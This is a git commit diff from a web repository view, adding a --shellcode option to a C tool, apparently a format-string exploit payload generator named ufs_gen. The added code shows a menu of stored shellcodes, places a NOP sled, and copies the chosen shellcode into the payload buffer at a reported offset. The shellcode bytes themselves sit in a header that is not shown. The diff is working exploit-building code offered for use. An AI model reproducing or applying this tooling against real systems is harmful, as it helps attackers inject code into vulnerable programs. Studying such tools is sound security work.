summaryrefslogtreecommitdiff
path: root/main.c
diff options
context:
space:
mode:
authorOlivier Gayot <duskcoder@gmail.com>2014-01-27 23:43:25 +0000
committerOlivier Gayot <duskcoder@gmail.com>2014-01-27 23:45:21 +0000
commit9756784b22d6be33683b9ecb3040c67685d354f7 (patch)
treec06b2df5368a303036cd451b67cdb5f5915ce13b /main.c
parent4bf33acfc969aa9b45470c481ec303ab7cdc9625 (diff)
add the option --shellcode
the user is now able to get a list of common shellcodes to append between the null bytes and the suffix closes #1
Diffstat (limited to 'main.c')
-rw-r--r--main.c67
1 files changed, 58 insertions, 9 deletions
diff --git a/main.c b/main.c
index 1c4bc17..30605f1 100644
--- a/main.c
+++ b/main.c
@@ -24,6 +24,7 @@
#include <stdio.h>
#include <getopt.h>
+#include "shellcodes.h"
static unsigned char payload[4096];
@@ -48,6 +49,11 @@ static char *suffix_g = NULL;
/* how many NOP bytes (0x90) shall we append before suffix */
static int suffix_nops_g = 0;
+/* shall we display a menu with the possible shellcodes ? */
+static bool select_shellcode_g = false;
+
+static char *shellcode_g = NULL;
+
__attribute__((noreturn))
static void usage(const char *arg0)
{
@@ -57,7 +63,9 @@ static void usage(const char *arg0)
fputs(
"ufs_gen "
"[--prefix pfx] [--suffix sfx] [--sfxnops n]\n"
- " --override addr --with addr --stackidx idx\n", stderr);
+ " --override addr --with addr --stackidx idx\n"
+ " --shellcode\n"
+ , stderr);
exit(EX_USAGE);
}
@@ -82,16 +90,18 @@ static int parse_arguments(int argc, char *argv[])
OPT_PREFIX,
OPT_SUFFIX,
OPT_SFX_NOPS,
+ OPT_SHELLCODE,
};
static struct option long_options[] = {
- {"override", required_argument, 0, OPT_OVERRIDE},
- {"with", required_argument, 0, OPT_WITH},
- {"stackidx", required_argument, 0, OPT_STACKIDX},
- {"addrsize", required_argument, 0, OPT_ADDR_SIZE},
- {"prefix", required_argument, 0, OPT_PREFIX},
- {"suffix", required_argument, 0, OPT_SUFFIX},
- {"sfxnops", required_argument, 0, OPT_SFX_NOPS},
+ {"override", required_argument, 0, OPT_OVERRIDE},
+ {"with", required_argument, 0, OPT_WITH},
+ {"stackidx", required_argument, 0, OPT_STACKIDX},
+ {"addrsize", required_argument, 0, OPT_ADDR_SIZE},
+ {"prefix", required_argument, 0, OPT_PREFIX},
+ {"suffix", required_argument, 0, OPT_SUFFIX},
+ {"sfxnops", required_argument, 0, OPT_SFX_NOPS},
+ {"shellcode", no_argument, 0, OPT_SHELLCODE},
};
int option_index;
@@ -131,6 +141,9 @@ static int parse_arguments(int argc, char *argv[])
case OPT_SFX_NOPS:
suffix_nops_g = atoi(optarg);
break;
+ case OPT_SHELLCODE:
+ select_shellcode_g = true;
+ break;
default:
/*
* we must have accessed an option which we do not have
@@ -198,6 +211,30 @@ int main(int argc, char *argv[])
usage(argv[0]);
}
+ if (select_shellcode_g) {
+ for (;;) {
+ char buffer[256];
+ int sel;
+
+ /* display the name of the common shellcodes */
+ for (int _i = 0; _i < SHELLCODE_COUNT; ++_i) {
+ fprintf(stderr, "%02d - %s\n", _i + 1, common_shellcodes_g[_i].name);
+ }
+ fputs("select a shellcode. CTRL-D for no shellcode: ", stderr);
+
+ if (fgets(buffer, sizeof(buffer), stdin) == NULL)
+ break;
+
+ /* check if the selection is valid */
+ sel = atoi(buffer);
+ if (sel <= 0 || sel > SHELLCODE_COUNT)
+ continue;
+
+ shellcode_g = common_shellcodes_g[sel - 1].payload;
+ break;
+ }
+ }
+
if (prefix_g != NULL) {
int len_pfx = strlen(prefix_g);
int mod_len_pfx = len_pfx % address_size_g;
@@ -242,11 +279,23 @@ int main(int argc, char *argv[])
++idx_stack_g;
}
- fprintf(stderr, "NOP bytes are at offset %d (%#x)\n", i, i);
+ /* append the NOP bytes */
+ if (suffix_nops_g > 0) {
+ fprintf(stderr, "NOP bytes are at offset %d (%#x)\n", i, i);
+ }
for (int nop = 0; nop < suffix_nops_g; ++nop) {
payload[i++] = '\x90';
}
+ /* append the shellcode */
+ if (shellcode_g != NULL) {
+ fprintf(stderr, "shellcode is at offset %d (%#x)\n", i, i);
+ int len_shellcode = strlen(shellcode_g);
+
+ memcpy(payload + i, shellcode_g, len_shellcode);
+ i += len_shellcode;
+ }
+
if (suffix_g != NULL) {
fprintf(stderr, "suffix is at offset %d (%#x)\n", i, i);
int len_suffix = strlen(suffix_g);